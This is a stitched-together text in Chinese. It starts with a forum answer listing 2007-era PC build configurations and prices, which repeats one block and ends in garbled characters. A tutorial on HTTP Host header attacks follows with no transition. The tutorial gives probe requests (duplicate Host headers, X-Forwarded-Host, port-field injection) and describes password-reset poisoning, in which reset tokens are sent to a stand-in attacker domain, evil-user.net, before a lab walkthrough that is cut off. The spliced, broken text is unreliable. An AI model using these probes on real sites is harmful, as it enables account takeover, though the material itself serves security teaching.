CPU Intel 奔腾D 820 2.8GHz(盒) 640 (目前这款CPU 性价比不高)
Intel 奔腾D 805 2.66GHz(盒) 590 (目前这款CPU 性价比不高)
主板 升技 IL9 Pro 699
微星 945P Neo5-F 699 3月28日广州降
映泰 Tforce 945P SE 690
华硕P5LD2 SE 860
技嘉 GA-945P-DS3 840
精英P965T-A 890
富士康 P9657AA-8KS2H 850
七彩虹 C.P965-MVP 699 (正宗扣肉主板)
内存 威刚 红色威龙512MB DDR2 667 250×2/威刚红色威龙DDR2 667 1G 480元
金士顿 DDR2 512M 667 230×2/金士顿DDR2 667 1G 430元 推荐
宇瞻 DDRII667 512MB 210×2/宇瞻DDR2 667 1G 普条 420元 推荐
三星金条DDR2 6667 512M 240*2 /三星金条DDR2 667 1G 460元 推荐
海盗船 VS512MB667D2 215元*2/海盗船 VS1GB667D2 419元(1G DDR2 667)
海盗船 TWIN2X 1G 675(512M*2) 720元
硬盘 西部数据WD1600AAJS 8M SATA2 440/西部数据 WD1600YS 470元 SATA2 16M 160G
三星SP20004C 460元(200G)/希捷 酷鱼7200.10/ST3160815AS 459元 160G SATA2
显卡 Inno3D 7600GS 游戏战神加强版 799元 1.2ns/256M/600MHz/1500MHz 公版 推荐
七彩虹 天行 7600GS UP烈焰战神2 256M,799元 1.1ns/256M/500MHz/1500MHz 公版 推荐
微星 NX7600GT-TD256E 涡轮风暴 799元 1.3ns/256M/128bit/560MHz/1400MHz 推荐
迪兰恒进 镭姬杀手X1650GT(1.2ns/ DDR3/256M/128bit/500MHz/1400MHz)699元 推荐
蓝宝石 X1650GT (1.2ns/ DDR3/256M/128bit/525MHz/1400MHz) 699元 推荐
卡恩斯迪 X1650GT (1.2ns/ DDR3/256M/128bit/600MHz/1400MHz) 559元
映众7600GST游戏王子 599元 1.4ns/128M/128bit/500/1400MHz 公版 推荐
七彩虹 镭风X1650GT-GD3 CF白金版 256M V14 599元
富彩7600GS魔龙版(1.2ns/DDR3/128M/128bit/560MHz/1300MHz)价格:599元
翔升 爵豹7600GS 128M 128B GD3 599元(1.4ns/DDR3/128M/128bit/560MHz/1200MHz)
捷波 坚鸟7313GTO(1.2ns/128M/128bit/560MHz/1400MHz) 499元
旌宇征服者7300GT 499元 1.4ns/500/1400MHz
宝联 玄冰7300GT海外版III代 (1.2ns/500MHz/1500MHz) 499元
显示器 飞利浦 107Q6 980/17吋LCD AOC 173P 1499元
光驱 华硕 DVD-E616A3 165 /先锋DVD-227 190
机箱 自选 150
电源 先马超影450 (2.2版,350W额定) 195
配置点评:Intel平台主流配置。采用双核心的PD 820,640元左右CPU“性价比”不如采用65nm技术的PD915 660元更合算,PD820工作时的发热量稍大。这个应该注意。有条件的话可以买一个比较好的散热风扇。配置搭配升技IL8 (945P主板,OC性能十分强劲)、2条512MB DDR2内存、160G硬盘和DDR3 7600GS显卡或者X1600XT的组合,游戏性能强劲,同时可以兼顾学习,平时办公做图都可以基本满足。(在这个配置中我还是比较喜欢P4 631,发热量比820小,缺点就是单核)
自己看吧
回答者:AJ狂风是我 - 助理 三级 4-9 21:29
我来给你个很详细的配置平台!这些配置平台都是今天刚整理出来的,报价非常的准确=================================================
=========================K8A2====================================
Intel平台主流配置
(一)3000元入门级配置
CPU CD 331 盒2.66GHz 265 / CD 331 散装 210 元
Celeron D 346 3.06G 散 300元
散装CPU加风扇:九州风神WIN6700 60元/酷冷至尊冰玲珑 75元
主板 捷波 P6AXP-MX (945GZ) 499
富士康 945GZ7MC-RS2H 540 推荐
技嘉 GA-8I945GZME-RH 590 (提示:945GZ提供PCI-E 4X显卡插槽)
华硕 P5GZ-MX 599 推荐
富士康 945G7MA-8KS2 590 (北京报价,945G,4条内存槽) 重点推荐
华硕 P5L-MX 790(支持Core 2 Duo)
技嘉 GA-945GM-S2 799
梅捷 SY-I5G6-G 799 (推荐,这是G965 的主板,支持DX10,最强的集成显卡主板之一)
升技LG-95 (945G) 699元
内存 威刚红色威龙512M DDR2 667 265/威刚万紫千红DDR2 667 512M 215
三星金条DDR2 667-512M 260 推荐
宇瞻DDR2 667 512M 230
金士顿 DDRII667 512M 240
硬盘 西部数据WD800AAJS 80G 7200转/8M 350 元
显卡 主板集成
显示器 飞利浦 107H6 890 /AOC 772S 799元
光驱 建兴 SOHD-16P9S 165元
机箱 自选 100 -140
电源 长城300P4 120
配置点评:赛扬D 336处理器以300元不到的价格是Intel平台组建入门级的首选,一套Intel入门级平台,搭配915GV或945GZ、945G主板、512MB DDR2内存、80G硬盘的组合。足够满足普通办公、上网。主板预留的PCI-E插槽也为日后加强图形处理能力提供了帮助。(显卡编辑“太平洋的水”提示大家,主板也可以考虑更低级别的865GV,399元附近也是很有价格优势的。)
(二)4000元学习配置
CPU Intel Celeron D 352 3.2G 散 330元 65nm 512K 盒:390元
Celeron D 356 3.33G 散 330元 65nm 512K 加散热器:50-60元
Intel Pentium4 631(64位/盒) 520 65nm ,最值得购买的P4,
主板 映泰TF 945P SE 690 推荐
磐正 5P945-I3 690
昂达 945PLN 590
精英945PL-A 590
精英 945P-A V3.0 666 推荐
华硕 P5AD2-E 590 (925X芯片,不支持双核,不支持65nm的CPU,是P4 630的好搭档)
升技 IL9 Pro 690 推荐
内存 金士顿 DDRII667 512MB 240 推荐
宇瞻 DDRII667 512MB 230 推荐
红威512M DDR2 667 265
三星金条DDR2 667 512M 260 推荐
威刚 万紫千红 DDRII667 512M 215
海盗船 VS512MB667D2 249 (普条)
硬盘 西部数据WD1600AAJS SATA2 8M 440 /西部数据 WD1600YS 470元 SATA2 16M 160G
显卡 迪兰恒进镭姬杀手X700XT欧美版 388元 2.0ns/128M/128Bit/475/1050MHz 最强的X700 显卡
捷波 坚鸟7313GTO(1.2ns/128M/128bit/560MHz/1400MHz) 499元
旌宇征服者7300GT 499元 1.4ns/128M/128bit/500/1400MHz
宝联 玄冰7300GT海外版III代 (1.2ns/DDR3/128M/128bit/500MHz/1500MHz) 499元 推荐
蓝宝石X1300XT海外版2代 590元(128M) 推荐
迪兰恒进 镭姬杀手X1650GT(1.2ns/ DDR3/256M/128bit/500MHz/1400MHz)699元 推荐
蓝宝石 X1650GT (1.2ns/ DDR3/256M/128bit/525MHz/1400MHz) 699元 推荐
卡恩斯迪 X1650GT (1.2ns/ DDR3/256M/128bit/600MHz/1400MHz) 559元
映众7600GST游戏王子 599元 1.4ns/128M/128bit/500/1400MHz 公版 推荐
影驰GF7600GE高清版 599 (1.4ns)
华硕 EN7300GT TOP/HTD/128M 599元 1.4ns/128MB/128bit/550MHz/1400MHz 推荐
七彩虹 镭风X1650GT-GD3 CF白金版 256M V14 599元
显示器 飞利浦 107H6 890/优派E72F+ 850元/AOC 795FK 890元
光驱 建兴 SOHD-16P9S 165元
机箱 自选 100-150
电源 航嘉冷静王钻石版 190 /九州风神SUV-400 170元/TT XP355 180元/先马超影450 190元(2.2版,350W额定)
配置点评:一套中低端Intel平台主流配置。采用奔腾4处理器搭配512MB DDR2内存,945主板、160G硬盘和7300GT、7600GS或X1600系列显卡的组合,综合性好,同时这个价位非常适合广大学生朋友。内存也可以根据实际需要加到1G。
(三)4700元主流双核配置
CPU Intel 奔腾D 820 2.8GHz(盒) 640 (目前这款CPU 性价比不高)
Intel 奔腾D 805 2.66GHz(盒) 610 (目前这款CPU 性价比不高)
主板 升技 IL9 Pro 699
微星 945P Neo5-F 699 3月28日广州降
映泰 Tforce 945P SE 690
华硕P5LD2 SE 890
技嘉 GA-945P-DS3 840
精英P965T-A 890
富士康 P9657AA-8KS2H 850
七彩虹 C.P965-MVP 699 (正宗扣肉主板)
内存 威刚 红色威龙512MB DDR2 667 265×2/威刚红色威龙DDR2 667 1G 505元
金士顿 DDR2 512M 667 250×2/金士顿DDR2 667 1G 450元 推荐
宇瞻 DDRII667 512MB 230×2/宇瞻DDR2 667 1G 普条 430元 推荐
三星金条DDR2 6667 512M 260*2 /三星金条DDR2 667 1G 520元 重点推荐
海盗船 VS512MB667D2 249元*2/海盗船 VS1GB667D2 459元(1G DDR2 667)
海盗船 TWIN2X 1G 675(512M*2) 740元
硬盘 西部数据WD1600AAJS 8M SATA2 440/西部数据 WD1600YS 470元 SATA2 16M 160G
显卡 Inno3D 7600GS 游戏战神加强版 799元 1.2ns/256M/600MHz/1500MHz 公版 推荐
七彩虹 天行 7600GS UP烈焰战神2 256M,799元 1.1ns/256M/500MHz/1500MHz 公版 推荐
微星 NX7600GT-TD256E 涡轮风暴 799元 1.3ns/256M/128bit/560MHz/1400MHz 推荐
映众 7600GT战神版(1.2ns/DDR3/256M/128bit/560MHz/1500MHz) 899元 公版
精英武士7612T 699元,128M/128bit/1.4ns/DDR3/560/1400MHz 公版
迪兰恒进 镭姬杀手X1650GT(1.2ns/ DDR3/256M/128bit/500MHz/1400MHz)699元 推荐
蓝宝石 X1650GT (1.2ns/ DDR3/256M/128bit/525MHz/1400MHz) 699元 推荐
卡恩斯迪 X1650GT (1.2ns/ DDR3/256M/128bit/600MHz/1400MHz) 559元
映众7600GST游戏王子 599元 1.4ns/128M/128bit/500/1400MHz 公版 推荐
七彩虹 镭风X1650GT-GD3 CF白金版 256M V14 599元
影驰 7600GE高清版 599元 1.4ns/128M/128bit/500/1400MHz
富彩7600GS魔龙版(1.2ns/DDR3/128M/128bit/560MHz/1300MHz)价格:599元
翔升 爵豹7600GS 128M 128B GD3 599元(1.4ns/DDR3/128M/128bit/560MHz/1200MHz)
捷波 坚鸟7313GTO(1.2ns/128M/128bit/560MHz/1400MHz) 499元
旌宇征服者7300GT 499元 1.4ns/500/1400MHz
宝联 玄冰7300GT海外版III代 (1.2ns/500MHz/1500MHz) 499元
显示器 飞利浦 107Q6 980/17吋LCD AOC 173P 1499元
光驱 华硕 DVD-E616A3 165 /先锋DVD-227 190
机箱 自选 150
电源 先马超影450 (2.2版,350W额定) 195
配置点评:Intel平台主流配置。采用双核心的PD 820,640元左右CPU“性价比”不如采用65nm技术的PD915 660元更合算,PD820工作时的发热量稍大。这个应该注意。有条件的话可以买一个比较好的散热风扇。配置搭配升技IL8 (945P主板,OC性能十分强劲)、2条512MB DDR2内存、160G硬盘和DDR3 7600GS显卡或者X1600XT的组合,游戏性能强劲,同时可以兼顾学习,平时办公做图都可以基本满足。(在这个配置中我还是比较喜欢P4 631,发热量比820小,缺点就是单核)
(四)6000元主流配置
CPU P D 915 盒(2.8G) 650 (65nm,发热量低、功耗低,是入门双核的首选)
主板 微星 945P Neo5-F 699 3月28日广州降
映泰 Tforce 945P SE 699
升技 IL9 Pro 699
技嘉 GA-945P-DS3 840
微星P965 NEO-F 990 支持扣肉
精英P965T-A 890 支持扣肉
富士康 P9657AA-8KS2H 850 支持扣肉
升技AB9 960
七彩虹 C.P965-MVP 699 P965 主板,支持扣肉
内存 威刚 红色威龙512MB DDR2 667 265*2
海盗船 VS512MB667D2 240元*2/海盗船 VS1GB667D2 459元
宇瞻 DDRII667 512MB 230*2 /宇瞻DDR2 667 1G 430元
金士顿DDR2 667 512M 250*2
威刚红色威龙DDR2 667 1G 505 推荐
三星金条DDR2 667 1G 520 推荐
金士顿 KHX6000D2K2/1G 890 DDR2 750
金士顿DDR2 667 1G 450 推荐
海盗船 TWIN2X 1G 675(512M*2) 730
显卡 讯景 7600GT(T73G-UAC) 999元 1.1ns/256M/128bit/675MHz/1700MHz
Inno3D GeForce 7600GT战神版 899 80nm/1.2ns/256M/560MHz/1500MHz 公版
微星 NX7600GT-TD256E 涡轮风暴 799元 1.3ns/256M/128bit/560MHz/1400MHz 推荐
微星 阿修罗7600GS-TD256E 豪华版 699元 1.4ns/256M/560/1400MHz
Inno3D 7600GS游戏战神加强版 799元 1.2ns/256M/600MHz/1500MHz 公版 推荐
七彩虹 天行 7600GS UP烈焰战神2 256M,799元 1.1ns/256M/500MHz/1500MHz 公版 推荐
富彩7600GT魔龙版 799元 1.4ns/560MHz/1400MHz
影驰 7900GS高清版 (1.4ns/DDR3/256M/256bit/540MHz/1400MHz)价格:999元
富彩 7900GS魔龙版 998元 1.4ns/256M/256bit/550/1450MHz 送150元罗技光电高手800键鼠套装
映泰 ∑Gate V7903GS22 899元 1.4ns/500/1400MHz/双256
Inno3D 7900GS终极战斗版 (1.2ns/ DDR3/256M/256bit/540MHz/1500MHz) 1099元 公版 推荐
蓝宝石X1950GT 1099元
硬盘 希捷 酷鱼7200.9/ST3160811AS 470
西部数据 WD1600AAJS 440 SATA2 160G
光驱 先锋112CH 295/先锋DVD-227 190
显示器 三星 997MB+ 1280 /飞利浦190CW7 1690元
机箱 自选 100-200
电源 先马超影450 190元/鑫谷速核535PE 280元/TT KK450 310元/航嘉宽幅王二代 300元
配置点评:这套配置选用了65纳米制程,外频为200MHz,FSB 800MHz,主频2.8GHz,拥有2*2MB二级缓存的Intel PentiumD 915处理器,再加上1GB双通道DDR2 800内存,可以让处理器轻松超频至4GHz的频率。显卡采用7600GT,搭配DDR2 667内存,主流游戏自然可以应付。喜欢I平台的朋友可以参考。如果搭配微星P965 NEO-F 990元,以后还可以升级为扣肉。个人认为PD 915 的CPU 上7900GS或上X1950PRO 的显卡,显卡有些偏高。
(五)7500元扣肉配置
推荐:技嘉 GA-965P-DS3 Ver 3.3+Intel Core 2 Duo E6300 盒 套装价:2599元
http://www.pconline.com.cn/diy/main/hq/gz/0703/988938_3.html
CPU:Intel Core 2 Duo E6300(扣肉) 1.86GHz 1410
Intel Core 2 Duo E6400 2.13G 1800-1860元/ E6600 盒 2530-2570元
主板 技嘉GA-965P-DS3 V2.0(或V3.3) 1290-1380 价格还不稳定
华硕P5B 1220 推荐
钻石INFINITY 975X-G 1399 975X +ICH7R
微星P965 Platinum 1399 ICH8R 推荐
七彩虹 九段玩家C.975X-MVP 1299 DFI代工
升技AB9 950-999 推荐
捷波悍马HI01 899 推荐
微星 P965 Neo-F 999
富士康 P9657AA-8KS2H 850 推荐
映泰 TForce P965 VER5.0 999
精英965P-A 899
富士康 975X7AB-8EKRS2H 1399元,数字化供电(服务器主板模式供电)975X + ICH7R 两个IDE
内存 金士顿512M/DDR2/667 250×2
海盗船 TWIN2X 1G 675(512M*2) 730
金士顿DDR2 667 1G 450 推荐
三星金条DDR2 667 1G 520 推荐
宇瞻 DDRII667 1GB 430
宇瞻黑豹DDR2 667 1G 550 推荐
金士顿 KHX6000D2K2/1G 880×2 (DDR2 750) 推荐
威刚 红色威龙 DDRII667 1G 505*2 推荐
威刚 红色威龙 DDRII800 1G 630*2 推荐
金士顿HyperX DDRII 750 1G 890×2 推荐预算充足的用户使用
芝奇G.SKILL F2-6400PHU2-2GBHZ(DDR2 800 1G*2) 2399 小D9 颗粒
硬盘:希捷 酷鱼7200.9/ST3160811AS 470
西部数据 WD1600YS 470 (SATA2 16M 160G)
希捷 酷鱼7200.10/ST3320620AS 780 (SATA2 16M 320G) 民用最快的硬盘
希捷 酷鱼7200.10/ST3250820AS 600
显卡:讯景 7600GT(T73G-UAC) 999元 1.1ns/256M/128bit675MHz/1700MHz
微星 NX7600GT-TD256E 涡轮风暴 799元 1.3ns/256M/128bit/560MHz/1400MHz 推荐
Inno3D GeForce 7600GT战神版 899 80nm/1.2ns/256M/560MHz/1500MHz 公版
Inno3D 7600GS 游戏战神加强版 799元 1.2ns/256M/600MHz/1500MHz 公版 推荐
七彩虹 天行 7600GS UP烈焰战神2 256M,799元 1.1ns/256M/500MHz/1500MHz 公版 推荐
讯景 7900GS Extreme(T71P-UDE) 1299元 1.4ns/256bit/256M/480/1400MHz
Inno3D 7900GS终极战斗版 (1.2ns/ DDR3/256M/256bit/540MHz/1500MHz) 1099元 公版 推荐
七彩虹 镭风X1950Pro-GD3 CH版 899元(1.2ns/ DDR3/256M/256bit/575MHz/1200MHz)
富彩 7900GS魔龙版 998元 1.4ns/256M/256bit/550/1450MHz 送160元罗技光电高手800键鼠套装
映泰 ∑Gate V7903GS22 899元 1.4ns/500/1400MHz/双256
蓝宝石X1950Pro 新版 1199元 推荐
蓝宝石 X1950GT 999元 1.4ns/256M/256bit/500/1200MHz 推荐
蓝宝石 X1950PRO 256M 静音版 1599元
迪兰恒进 镭姬杀手X1950Pro 豪华版 1399元 推荐
影驰 7950GT (1.2ns/ DDR3/256M/256bit/565MHz/1430MHz) 价格:1399元 推荐
微星 RX1950XT-VT2D256E-HD 1899元 1.0ns/256M/256Bit/625MHz/1800MHz 推荐
Inno3D 7950GT 256M 1799元 1.2ns/256MB/256Bit/550/1500MHz VF900 风扇 推荐
翔升权杖7900GS (1.4ns/DDR3/256M/256bit/450MHz/1320MHz) 价格:999元 推荐
影驰 Geforce 8800GTS 游戏盒子 2499元 1.1ns/320M/320bit/550/1800MHz 推荐
七彩虹 天行8800GTS-GD3 CH版 320M V11 2299元赠送HDMI线 1.1ns/320M/320bit/500/1600MHz 公版,推荐
华硕 DVD-E616A3T 198元 SATA DVD /先锋 DVD-227E 199元 SATA DVD/建兴 LTC-48161H 199元 COMBO
刻录机:华硕 DRW-1814BLT 359元SATA接口/先锋 DVR-212CH 329元 SATA 接口/三星 18X DVD刻录机(SATA) TS-H653A 350元
机箱:150元-350自选
电源:鑫谷速核535PE 270元/康舒 ATX-350CT E2 270元/TT 450 SE 350元/航嘉冷静王至尊版 390元
显示器:19吋宽:三星931BW 1999元/优派 VX1935wm 1929元/飞利浦 190CW7 1690元/AOC 193FW 1599元
19吋普屏:三星932B 1999元/优派 VE920m:1699 送优派台灯/AOC 197P+ 1699元
预算充足和游戏爱好者推荐使用:
主板:微星P965 Platinum 1499元 (部分地方降为了1399元)
华硕P5B-E 1490元/华硕P5B-E Plus 1599元
微星975X Platinum 1780元 版本号2.1可支持Conroe
技嘉965P-DS4(1699元)
华硕P5B Deluxe 1880元
升技 AW9D 1799元
升技AB9 Quad GT 1899元 数字化IC模块供电
显卡:讯景8800GTS(PV-T80G-GHD)(1.1ns/DDR3/320M/320bit/580MHz/1800MHz)价格:2699元
影驰 8800GTS游戏盒子 (1.1ns/DDR3/320M/320bit/550MHz/1800MHz) 价格:2499元
映众 8800GTS (1.1ns/DDR3/320M/320bit/500MHz/1600MHz) 价格:2499元
富彩 8800GTS暴龙版 (1.2ns/DDR3/320M/320bit/500MHz/1600MHz) 价格:2299元
翔升 权杖8800GTS (1.2ns/DDR3/320M/320bit/500MHz/1600MHz) 价格:2299元
(目前生产的8800GTS 显卡都是公版显卡,购买的时候看价格、服务和保修即可)
微星 RX1950XT-VT2D256E-HD 1899元 1.0ns/256M/256Bit/625MHz/1800MHz
迪兰恒进 镭姬杀手X1950XT 1999元 1.0ns/256MB/256bit/625MHz/1800MHz
蓝宝石 X1950XT 1999元 1.0ns/256MB/256bit/621MHz/1740MHz
Inno3D 7950GT 1799元 256M/256bit/1.4ns/550MHz/1400MHz
电源(400W额定):航嘉多核DH6 390元/航嘉冷静王至尊版 399元/全汉绿宝400 399元
(450W额定):航嘉极能8588 600元/康舒 ATX-450C-A2SNN 600元/TT 550PP 450元(450W)
特别用户:硬盘组成RAID 0 或用西部数据猛禽,显卡考虑专业显卡。
扣肉配置,详细内容请点击“一不小心贴”
AMD平台主流配置
(一)3000元入门级配置
CPU AMD AM2 Sempron 3000+(盒) 310 /AMD AM2 Sempron 2800+ 盒 290
主板 磐正 超磐手MGF6100-M 590
映泰 GForce 6100-AM2 590
技嘉M51GM-S2G 680
昂达 N61GT v2.0 490
微星 K9NG NEO-V 599元 赠送价值88元的微星超人光电套装 C51 大板 推荐
华硕 M2V-TVM 490
昂达 A69T 599 推荐
七彩虹 C.A69G-HDMI 599 支持HDMI
捷波 K9X8G-MX 599 支持HDMI
内存 三星金条512M DDRⅡ667 260 推荐
宇瞻 DDRII667 512MB 230 推荐
红威512M DDR2 667 265
金士顿DDR2 667 512M 240
海盗船 VS512MB667D2 240 推荐
威刚万紫千红DDR2 667 512M 215
硬盘 西部数据WD800AAJS 80G 350 /西部数据WD1600AAJS 440元
显卡 集成
显示器 飞利浦 107H6 890 /AOC 772S 790元
光驱 华硕 黑豹静音王光驱 165 /先锋DVD-227 190
机箱 自选 100
电源 长城300W 120
配置点评:AMD AM2闪龙3000+处理器主频为1.6GHz,外频为200MHz,L2缓存为256K,支持双通道DDR2内存,与Intel赛扬D 346处理器针锋相对。另外,这款处理器拥有不俗的超频能力。一套AMD入门级平台推荐配置,采用了AM2闪龙3000+搭配C51G主板、512MB内存、80G硬盘的组合,能满足一般的办公、上网和一些休闲游戏等要求。
(二)4000元入门级独立显卡配置
CPU AMD AM2 Sempron 3000+(盒) 310 /AMD AM2 Sempron 2800+ 盒 290
主板 映泰TF 550 SE 690
昂达NF5S 590
七彩虹 C.KT9-M2 Ver1.4 390 大板,Unicon固态电容+红宝石电容
磐正 超磐手EP-MF4-3 590
七彩虹 C.AK4N-M2 Ver1.4 599元 DFI代工
磐正 AK890 499 K8T890+8237R Plus
捷波悍马HA01-GT 599 重点推荐
内存 三星金条 512M DDRⅡ667 260*2
宇瞻 DDRII667 512MB 230
红威512M DDR2 667 265
金士顿DDR2 667 512M 240
海盗船 VS512MB667D2 240
硬盘 西部数据WD800AAJS 80G 350 /西部数据WD1600AAJS 440元 160G SATA2
显卡 迪兰恒进镭姬杀手X700XT欧美版 388元 2.0ns/128M/128Bit/475/1050MHz
映众7600GST游戏王子 599元 1.4ns/128M/128bit/500/1400MHz 公版 推荐
影驰 7600GE高清版 599元 1.4ns/128M/128bit/500/1400MHz
富彩7600GS魔龙版(1.2ns/DDR3/128M/128bit/560MHz/1300MHz)价格:599元
翔升 爵豹7600GS 128M 128B GD3 599元(1.4ns/DDR3/128M/128bit/560MHz/1200MHz)
迪兰恒进 镭姬杀手X1650GT(1.2ns/ DDR3/256M/128bit/500MHz/1400MHz)699元
蓝宝石 X1650GT (1.2ns/ DDR3/256M/128bit/525MHz/1400MHz) 699元
卡恩斯迪 X1650GT (1.2ns/ DDR3/256M/128bit/600MHz/1400MHz) 559元
七彩虹 镭风X1650GT-GD3 CF白金版 256M V14 599元
捷波 坚鸟7313GTO(1.2ns/128M/128bit/560MHz/1400MHz) 499元
旌宇征服者7300GT 499元 1.4ns/500/1400MHz
宝联 玄冰7300GT海外版III代 (1.2ns/DDR3/128M/128bit/500MHz/1500MHz) 499元 推荐
光驱 华硕 黑豹静音王光驱 165 /先锋DVD-227 190
机箱 自选 100
电源 长城350P4 150
显示器 飞利浦 107H6 890 /AOC 772S 780元
液晶: AOC 177Si 1399元/飞利浦 170C7 1499元/AOC 173P 1499元/易美逊 Envision H177 1299元(VGA)
配置点评:本方案为家庭娱乐方案,配置了性能较强的独立显卡,适当超频,可以满足玩游戏的要求(少开特效)。
(三)4500元主流配置
CPU AMD AM2 Athlon64 3000+盒装 375 推荐
AMD AM2 Athlon64 3200+ 盒 475
AMD AM2 Athlon64 3500+ 盒 530
主板 微星 K9N NEO-F (NF550芯片) 730
映泰TF550 SE (NF550芯片) 690
升技KN9S (NF550芯片) 690
昂达NF5S 590
捷波悍马HA01-GT 599 推荐
磐正AF570T ULTRA 690 (首选)
映泰 TForce 570 U 790
内存 三星金条DDR2 667 512M 260*2 /三星金条DDR2 667 1G 515元 推荐
威刚 红色威龙512MB DDR2 667*2 265×2/威刚红色威龙DDR2 667 1G 510元 ?/ca>
参考资料:http://itbbs.pconline.com.cn/topic.jsp?tid=3081909&lastUpdate=03-31.16:32
1. HTTP Host头攻击从HTTP / 1.1开始,HTTP Host标头是必需的请求标头。它指定客户端要访问的域名。例如,当用户访问https://example.net/web-security时,其浏览器将组成一个包含Host标头的请求,如下所示:
GET /web-security HTTP/1.1
Host: example.net
HTTP Host头的目的是帮助识别客户端要与之通信的后端组件。如果请求不包含Host头或者格式不正确,则在将传入请求的应用程序时可能会导致问题。
从历史上看,这种漏洞并不存在太大问题,因为每个IP地址只会被用于单个域的内容。如今,很大程度上是由于同一个IP上存在多个Web应用程序(不同端口,不同域名解析等),通常可以在同一IP地址访问多个网站和应用程序。这种方法的普及也部分是由于IPv4地址耗尽所致。
当可以通过同一IP地址访问多个应用程序时,最常见的原因是以下情况之一:
虚拟主机
单个Web服务器托管多个网站或应用程序。这可能是具有单个所有者的多个网站,但是也可能是不同所有者的网站托管在同一个共享平台上。它们都与服务器共享一个公共IP地址。
通过代理路由流量
网站托管在不同的后端服务器上,但是客户端和服务器之间的所有流量都通过代理系统进行路由。这可能是一个简单的负载平衡设备或某种反向代理服务器。在客户通过内容分发网络(CDN)访问网站的情况下,这种设置尤其普遍。
在上面两种种情况下,即使网站托管在单独的后端服务器上,它们的所有域名也都解析为中间组件的单个IP地址。这带来了与虚拟主机相同的问题,因为反向代理或负载平衡需要知道每个请求到的哪个后端上。
HTTP Host头的作用就在于,指定请求应该发送到那个应用程序的后端服务器上。打个比方,一封信需要送到居住在公寓楼中的某人手中,整个公寓有许多房间,每个房间都可以接受信件,通过指定房间号和收件人(也就是HTTP Host头)来将信封送到指定的人手中。
3. 什么是HTTP Host头攻击
一些网站以不安全的方式处理Host头的值。如果服务器直接信任Host头,未校验它的合法性,则攻击者可能能够使用此可控变量来注入Host,以操纵服务器端的行为。
现成的Web应用程序通常不知道将它们部署在哪个域上,除非在安装过程中在配置文件中手动指定了该域。例如,当他们需要知道当前域以生成电子邮件中包含的绝对URL时,他们可能依赖于Host头中的值:
<a href="https://_SERVER['HOST']/support">联系支持</a>
Host头值还可以用于不同网站系统之间的各种交互。
由于Host头实际上是用户可控制的,因此这种做法可能导致许多问题。如果未校验或者直接使用Host头,则Host头可以与一系列其他漏洞“组合拳”攻击,比如:
缓存投毒
特殊业务功能的逻辑漏洞
基于路由的SSRF
经典服务端漏洞,如SQL注入(当Host被用于SQL语句时)等
4. 如何发掘HTTP Host头攻击
首先要判断服务端是否检测Host头?检测完了是否还使用Host头的值?
通过修改Host的值,如果服务端返回错误信息:
30b04453d11b44a56c903cc387f17296.png
则说明服务端检测了Host的内容。至于有没有使用Host头的值,有以下几种方法去发掘:
修改Host值
简单的来说,可以修改HTTP头中的Host值,如果观察到响应包中含有修改后的值,说明存在漏洞。
但有时候篡改Host头的值会导致无法访问Web应用程序,从而导致“无效主机头”的错误信息,特别是通过CDN访问目标时会发生这种情况。
添加重复的Host头
添加重复的Host头,通常两个Host头之中有一个是有效的,可以理解为一个是确保请求正确地发送到目标服务器上;另一个则是传递payload到后端服务器中。
GET /example HTTP/1.1
Host: vulnerable-website.com
Host: attackd-stuff
使用绝对路径的URL
尽管许多请求通常在请求域上使用相对路径,但是也同时配置了绝对URL的请求。
GET https://vulnerable-website.com/ HTTP/1.1
Host: attack-stuff
有时候也可以尝试不同的协议,如HTTP或HTTPS。
添加缩进或换行
当一些站点block带有多个Host头的请求时,可以通过添加缩进字符的HTTP头来绕过:
GET /example HTTP/1.1
Host: attack-stuff
Host: vulnerable-website.com
注入覆盖Host头的字段
与Host头功能相近的字段,如X-Forwarded-Host、X-Forwarded-For等,这些有时候是默认开启的。
GET /example HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: attack-stuff
诸如此类,还有其他的字段:
X-Host
X-Forwarded-Server
X-HTTP-Host-Override
Forwarded
忽略端口仅校验域名
当修改、添加重复Host头被拦截的时候,可以尝试了解Web应用程序是怎样解析Host头的。
比如,一些解析算法会忽略Host头中的端口值,仅仅校验域名。这时候可以将Host修改为如下形式:
GET /example HTTP/1.1
Host: vulnerable-website.com:attack-stuff
保持域名不变,修改端口值为非端口号的其他值(非数字), 将Host头攻击的payload放在端口值处,同样能进行Host头攻击。
5. HTTP Host头攻击漏洞示例
5.1 密码重置中毒
根据HTTP Host头攻击的攻击特点,它被广泛应用于密码重置中毒:攻击者可以操纵网站在重置密码情况下生成的密码重置链接,使其发送攻击者指定的域下,利用此来窃取重置任意用户密码的令牌。
1c2aa7d6f7e77ca7c2bd09feee527087.png
一个重设密码(忘记密码)功能的大致流程如下:
用户输入其用户名或电子邮件地址,然后提交密码重置请求。
该网站检查该用户是否存在,然后生成一个临时的、唯一的、复杂的令牌,该令牌与后端的用户帐户相关联。
该网站向用户发送一封电子邮件,其中包含用于重置其密码的链接。重置令牌的参数包含在相应的URL中:
https://normal-website.com/reset?token=0a1b2c3d4e5f6g7h8i9j
4. 当用户访问此URL时,网站将检查提供的令牌是否有效,并使用它来确定要重置哪个帐户。如果一切都符合,则可以进入用户重置密码步骤。最后,令牌被销毁。
以上步骤的安全性依赖于:只有目标用户才能访问其电子邮件,从而可以访问其唯一的令牌。
密码重置中毒是窃取此令牌以更改另一个用户密码的一种漏洞。
如果网站重置密码的流程完全依赖用户的可控输入(如HTTP Host头),这可能导致密码重置中毒:
1. 攻击者获取受害者的用户名或者电子邮件,作为提交重置密码的请求,攻击者会拦截请求并修改HTTP Host头为其指定的域,如evil-user.net
2. 受害者会收到一封重置密码的邮件,但由于攻击者修改了Host头,而web程序生成重置链接又完全依赖于Host头,导致生成以下URL:
https://evil-user.net/reset?token=0a1b2c3d4e5f6g7h8i9j
3. 如果受害者点击了该链接,重置密码的令牌就会发送到攻击者的服务器 evil-user.net 上
4. 当攻击者获取到虫子密码的令牌之后,就会进行相应的构造访问真实重置密码的URL进行密码重置。
5.1.1 密码重置中毒—基础
详细了解了上面的密码重置中毒的流程和原理之后,这里通过HTTP Host头攻击导致的基础的密码重置中毒来演示。
首先输入用户名或者用户的电子邮箱来重置指定用户的密码:
534a1d062ccc3813b6596fdec0bb475b.png
提交之后,会发送一封重置密码的电子邮件到wiener用户的邮箱中(数据包如右图):
7c47a2e653a4fcbbaeae1687f914d093.png
注意重置密码的链接,可能是受Host头的值的影响?
我们来验证一下是否存在HTTP Host头攻击,修改Host头的值为 baidu.com:
8901c053cc8c3e6f0383f5f61b14d549.png
发现请求是可以被后端服务器接收的,所以是存在HTTP Host头攻击的。
